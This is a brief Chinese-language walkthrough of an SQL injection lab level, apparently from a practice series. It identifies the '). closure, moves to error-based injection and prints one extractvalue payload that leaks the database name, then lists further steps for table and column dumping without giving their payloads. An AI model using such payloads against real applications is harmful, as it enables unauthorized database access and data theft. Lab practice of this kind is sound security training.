(1)检测闭合方式
通过 ') 闭合。
(2)尝试输入 admin')# 无回显。尝试报错注入,
爆表payload:
admin') and extractvalue(1,concat(0x7e,(select database()))) and ('
爆表名
爆users表的列
其他均与12关相同。
